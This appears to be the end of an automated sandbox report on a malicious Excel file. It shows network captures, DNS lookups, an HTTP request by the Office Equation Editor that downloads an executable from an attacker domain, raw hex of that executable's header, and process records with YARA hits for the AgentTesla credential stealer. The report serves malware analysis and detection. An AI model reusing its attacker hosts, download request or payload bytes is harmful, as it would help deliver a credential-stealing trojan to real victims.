                                        Apr 12, 2021 11:28:39.131782055 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.131784916 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.360080004 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.360116959 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.360135078 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.360152006 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.360166073 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.360174894 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.360177994 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.360189915 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.360202074 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.360213995 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.360241890 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.360255003 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.360897064 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.366812944 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.366836071 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.366848946 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.366866112 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.366883993 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.366904020 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.366921902 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.366938114 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.366949081 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.366955042 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.366966963 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.366970062 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.366972923 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.366988897 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.366990089 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.367007017 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.367010117 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.367022991 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.367024899 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.367041111 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.367043972 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.367060900 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.367062092 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.367077112 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.367080927 CEST8049168103.153.76.181192.168.2.22

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Apr 12, 2021 11:28:36.144310951 CEST5219753192.168.2.228.8.8.8
                                        Apr 12, 2021 11:28:36.204019070 CEST53521978.8.8.8192.168.2.22
                                        Apr 12, 2021 11:28:36.656068087 CEST5309953192.168.2.228.8.8.8
                                        Apr 12, 2021 11:28:36.715300083 CEST53530998.8.8.8192.168.2.22
                                        Apr 12, 2021 11:28:36.718502998 CEST5283853192.168.2.228.8.8.8
                                        Apr 12, 2021 11:28:36.769905090 CEST53528388.8.8.8192.168.2.22
                                        Apr 12, 2021 11:28:36.770101070 CEST5283853192.168.2.228.8.8.8
                                        Apr 12, 2021 11:28:36.821435928 CEST53528388.8.8.8192.168.2.22
                                        Apr 12, 2021 11:28:37.350620985 CEST6120053192.168.2.228.8.8.8
                                        Apr 12, 2021 11:28:37.416701078 CEST53612008.8.8.8192.168.2.22
                                        Apr 12, 2021 11:28:37.419713020 CEST4954853192.168.2.228.8.8.8
                                        Apr 12, 2021 11:28:37.471184969 CEST53495488.8.8.8192.168.2.22
                                        Apr 12, 2021 11:28:38.115662098 CEST5562753192.168.2.228.8.8.8
                                        Apr 12, 2021 11:28:38.185177088 CEST53556278.8.8.8192.168.2.22
                                        Apr 12, 2021 11:30:17.847909927 CEST5600953192.168.2.228.8.8.8
                                        Apr 12, 2021 11:30:18.142748117 CEST53560098.8.8.8192.168.2.22
                                        Apr 12, 2021 11:30:18.143451929 CEST5600953192.168.2.228.8.8.8
                                        Apr 12, 2021 11:30:18.426093102 CEST53560098.8.8.8192.168.2.22
                                        Apr 12, 2021 11:30:18.426657915 CEST5600953192.168.2.228.8.8.8
                                        Apr 12, 2021 11:30:18.477006912 CEST53560098.8.8.8192.168.2.22
                                        Apr 12, 2021 11:30:18.551557064 CEST6186553192.168.2.228.8.8.8
                                        Apr 12, 2021 11:30:19.048425913 CEST53618658.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Apr 12, 2021 11:28:36.144310951 CEST192.168.2.228.8.8.80x2c09Standard query (0)fqe.short.gyA (IP address)IN (0x0001)
                                        Apr 12, 2021 11:28:38.115662098 CEST192.168.2.228.8.8.80x85bfStandard query (0)surestdysbonescagecv.dns.armyA (IP address)IN (0x0001)
                                        Apr 12, 2021 11:30:17.847909927 CEST192.168.2.228.8.8.80x438bStandard query (0)smtp.oucabem.com.brA (IP address)IN (0x0001)
                                        Apr 12, 2021 11:30:18.143451929 CEST192.168.2.228.8.8.80x438bStandard query (0)smtp.oucabem.com.brA (IP address)IN (0x0001)
                                        Apr 12, 2021 11:30:18.426657915 CEST192.168.2.228.8.8.80x438bStandard query (0)smtp.oucabem.com.brA (IP address)IN (0x0001)
                                        Apr 12, 2021 11:30:18.551557064 CEST192.168.2.228.8.8.80xd41cStandard query (0)smtp.oucabem.com.brA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Apr 12, 2021 11:28:36.204019070 CEST8.8.8.8192.168.2.220x2c09No error (0)fqe.short.gy52.59.165.42A (IP address)IN (0x0001)
                                        Apr 12, 2021 11:28:36.204019070 CEST8.8.8.8192.168.2.220x2c09No error (0)fqe.short.gy18.184.197.212A (IP address)IN (0x0001)
                                        Apr 12, 2021 11:28:38.185177088 CEST8.8.8.8192.168.2.220x85bfNo error (0)surestdysbonescagecv.dns.army103.153.76.181A (IP address)IN (0x0001)
                                        Apr 12, 2021 11:30:18.142748117 CEST8.8.8.8192.168.2.220x438bNo error (0)smtp.oucabem.com.brpop.oucabem.com.brCNAME (Canonical name)IN (0x0001)
                                        Apr 12, 2021 11:30:18.142748117 CEST8.8.8.8192.168.2.220x438bNo error (0)pop.oucabem.com.brmail.ita.locaweb.com.brCNAME (Canonical name)IN (0x0001)
                                        Apr 12, 2021 11:30:18.142748117 CEST8.8.8.8192.168.2.220x438bNo error (0)mail.ita.locaweb.com.br191.252.112.194A (IP address)IN (0x0001)
                                        Apr 12, 2021 11:30:18.426093102 CEST8.8.8.8192.168.2.220x438bNo error (0)smtp.oucabem.com.brpop.oucabem.com.brCNAME (Canonical name)IN (0x0001)
                                        Apr 12, 2021 11:30:18.426093102 CEST8.8.8.8192.168.2.220x438bNo error (0)pop.oucabem.com.brmail.ita.locaweb.com.brCNAME (Canonical name)IN (0x0001)
                                        Apr 12, 2021 11:30:18.426093102 CEST8.8.8.8192.168.2.220x438bNo error (0)mail.ita.locaweb.com.br191.252.112.194A (IP address)IN (0x0001)
                                        Apr 12, 2021 11:30:18.477006912 CEST8.8.8.8192.168.2.220x438bNo error (0)smtp.oucabem.com.brpop.oucabem.com.brCNAME (Canonical name)IN (0x0001)
                                        Apr 12, 2021 11:30:18.477006912 CEST8.8.8.8192.168.2.220x438bNo error (0)pop.oucabem.com.brmail.ita.locaweb.com.brCNAME (Canonical name)IN (0x0001)
                                        Apr 12, 2021 11:30:18.477006912 CEST8.8.8.8192.168.2.220x438bNo error (0)mail.ita.locaweb.com.br191.252.112.194A (IP address)IN (0x0001)
                                        Apr 12, 2021 11:30:19.048425913 CEST8.8.8.8192.168.2.220xd41cNo error (0)smtp.oucabem.com.brpop.oucabem.com.brCNAME (Canonical name)IN (0x0001)
                                        Apr 12, 2021 11:30:19.048425913 CEST8.8.8.8192.168.2.220xd41cNo error (0)pop.oucabem.com.brmail.ita.locaweb.com.brCNAME (Canonical name)IN (0x0001)
                                        Apr 12, 2021 11:30:19.048425913 CEST8.8.8.8192.168.2.220xd41cNo error (0)mail.ita.locaweb.com.br191.252.112.194A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • surestdysbonescagecv.dns.army

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249168103.153.76.18180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampkBytes transferredDirectionData
                                        Apr 12, 2021 11:28:38.419982910 CEST70OUTGET /documenpt/svchost.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Connection: Keep-Alive
                                        Host: surestdysbonescagecv.dns.army
                                        Apr 12, 2021 11:28:38.654712915 CEST72INHTTP/1.1 200 OK
                                        Date: Mon, 12 Apr 2021 09:28:38 GMT
                                        Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34
                                        Last-Modified: Mon, 12 Apr 2021 07:58:29 GMT
                                        ETag: "a0800-5bfc1e116a8f9"
                                        Accept-Ranges: bytes
                                        Content-Length: 657408
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/x-msdownload
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a5 fd 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 50 08 00 00 b6 01 00 00 00 00 00 e2 6f 08 00 00 20 00 00 00 80 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 6f 08 00 4f 00 00 00 00 80 08 00 dc b3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 50 08 00 00 20 00 00 00 50 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc b3 01 00 00 80 08 00 00 b4 01 00 00 52 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0a 00 00 02 00 00 00 06 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 6f 08 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 de 00 00 c8 d9 00 00 03 00 00 00 01 00 00 06 68 b8 01 00 28 b7 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 24 00 00 0a 28 25 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 26 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 27 00 00 0a 00 02 16 28 28 00 00 0a 00 02 17 28 29 00 00 0a 00 02 17 28 2a 00 00 0a 00 02 16 28 2b 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 18 02 00 06 28 2c 00 00 0a 00 2a 26 00 02 28 2d 00 00 0a 00 2a ce 73 2e 00 00 0a 80 01 00 00 04 73 2f 00 00 0a 80 02 00 00 04 73 30 00 00 0a 80 03 00 00 04 73 31 00 00 0a 80 04 00 00 04 73 32 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 33 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 34 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 35 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 36 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 37 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 38 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 39 00 00 0a 6f 3a 00 00 0a 73 3b 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELs`PPo @ `@oO@ H.textP P `.rsrcR@@.reloc@@BoHh(0($(%(o&*('((()(*(+*N(o(,*&(-*s.s/s0s1s2*0~o3+*0~o4+*0~o5+*0~o6+*0~o7+*0<~(8,!rp(9o:s;~+*0~


                                        HTTPS Packets

                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                        Apr 12, 2021 11:28:36.310041904 CEST52.59.165.42443192.168.2.2249165CN=*.short.gy CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Jan 23 20:36:49 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri Apr 23 21:36:49 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:11:27:36
                                        Start date:12/04/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                        Imagebase:0x13f080000
                                        File size:27641504 bytes
                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:11:27:57
                                        Start date:12/04/2021
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                        Imagebase:0x400000
                                        File size:543304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:11:28:03
                                        Start date:12/04/2021
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\Public\vbc.exe'
                                        Imagebase:0xaf0000
                                        File size:657408 bytes
                                        MD5 hash:D5A549B16706948E4355EB89A93CEDEB
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2151905175.00000000032C9000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:11:28:10
                                        Start date:12/04/2021
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\Public\vbc.exe
                                        Imagebase:0xaf0000
                                        File size:657408 bytes
                                        MD5 hash:D5A549B16706948E4355EB89A93CEDEB
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2344473049.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2345021459.000000000240E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2345021459.000000000240E000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        Disassembly

                                        Code Analysis

                                        Reset < >